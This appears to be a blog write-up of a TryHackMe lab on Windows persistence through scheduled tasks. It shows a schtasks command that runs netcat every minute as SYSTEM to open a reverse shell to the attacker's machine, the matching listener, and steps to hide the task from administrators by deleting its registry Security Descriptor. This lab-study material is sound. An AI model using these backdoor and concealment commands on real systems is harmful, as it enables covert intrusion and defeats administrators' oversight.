In this post, we covered part 4 of Windows Persistence Techniques and particularly we covered scheduled tasks as part of TryHackMe win local persistence.

The most common way to schedule tasks is using the built-in Windows task scheduler. The task scheduler allows for granular control of when your task will start, allowing you to configure tasks that will activate at specific hours, repeat periodically or even trigger when specific system events occur. From the command line, you can use schtasks to interact with the task scheduler. A complete reference for the command can be found on Microsoft’s website.

Understanding Scheduled Tasks for Persistence

I learned that scheduled tasks in Windows are pretty much like cron jobs in Linux. They let you run programs or scripts automatically at specific times or intervals. I can totally use this to my advantage by scheduling a payload to run regularly, essentially creating a backdoor. The key things I need to consider when making a backdoor task are:

  • Payload: This is the actual code or program the task will execute. It could be anything from a PowerShell script, an executable, Python code, or even simple Windows commands.
  • Date/Time: I need to set when and how often the task runs. It’s smarter to run it less frequently, like daily at startup, to avoid raising suspicion, rather than every few minutes.
  • User: To get the highest privileges, I’ll definitely want the task to run as the SYSTEM user.

Hiding the Scheduled Task

The video emphasized that a smart system administrator auditing scheduled tasks would likely spot a suspicious new one. To avoid detection, I can hide the task. This is done by messing with its Security Descriptor (SD). Think of the SD as an access control list that decides who can see or interact with the task. By deleting the SD from the registry, I can make the task invisible to everyone, including administrators, when they check the standard Task Scheduler interface. The task will still run, but it just won’t show up in the list!

Practical Steps and Commands

Here’s a breakdown of the steps I learned and the commands I’d use:

1. Creating the Scheduled Task

I’d use the schtasks.exe command-line tool. For example, to create a task that runs Netcat every minute to connect back to my machine (the attacker) as the SYSTEM user, I’d use:

Bash

schtasks.exe /create /sc minute /mo 1 /tn "Test Backdoor" /tr "C:\tools\nc.exe <MY_IP_ADDRESS> <PORT> -e cmd.exe" /ru system
  • /create: Tells the system I’m creating a new task.
  • /sc minute: Sets the schedule to run every minute.
  • /mo 1: A modifier for /sc, meaning “every 1 minute.”
  • /tn "Test Backdoor": Names my task “Test Backdoor.”
  • /tr "C:\tools\nc.exe <MY_IP_ADDRESS> <PORT> -e cmd.exe": This is the payload. It tells the task to run nc.exe from C:\tools, connect to my IP address on a specific port, and execute cmd.exe when it connects.
  • /ru system: Ensures the task runs under the powerful SYSTEM account.

2. Verifying the Task (Before Hiding)

Before making it disappear, I’d check if the task was created correctly:

Bash

schtasks.exe /query /tn "Test Backdoor"

3. Setting up a Listener

On my attacker machine, I’d set up a Netcat listener to catch the connection from the victim:

Bash

nc -lvp <PORT>
  • -l: Listen mode.
  • -v: Verbose output.
  • -p <PORT>: Specifies the port to listen on, matching the one in the scheduled task payload.

4. Hiding the Task via Registry

To make the task invisible, I need to delete its Security Descriptor from the Windows Registry. First, I’d open the Registry Editor with system privileges, likely using PsExec:

Bash

C:\tools\SysinternalsSuite\PsExec.exe -s -i regedit.exe
  • -s: Runs the process as SYSTEM.
  • -i: Runs it interactively.

Then, in regedit.exe, I’d navigate to:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\

Under the Tree key, I’d find the subkey for my task (e.g., “Test Backdoor”) and delete the SD (Security Descriptor) value inside it.

5. Verifying the Task is Hidden

After deleting the SD, if I tried to query the task again using schtasks.exe /query /tn "Test Backdoor", it should say the system can’t find the file. Also, opening the graphical Task Scheduler (taskschd.msc) wouldn’t show the task, even for an administrator. However, it’s worth noting that the task’s entry (without the SD) would still be visible in the registry path, so a very thorough administrator might still find it there.

Room Answers

Insert flag9 here
 

Video Walk-through

 

, , ,
Show Comments

The MasterMinds Notes

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles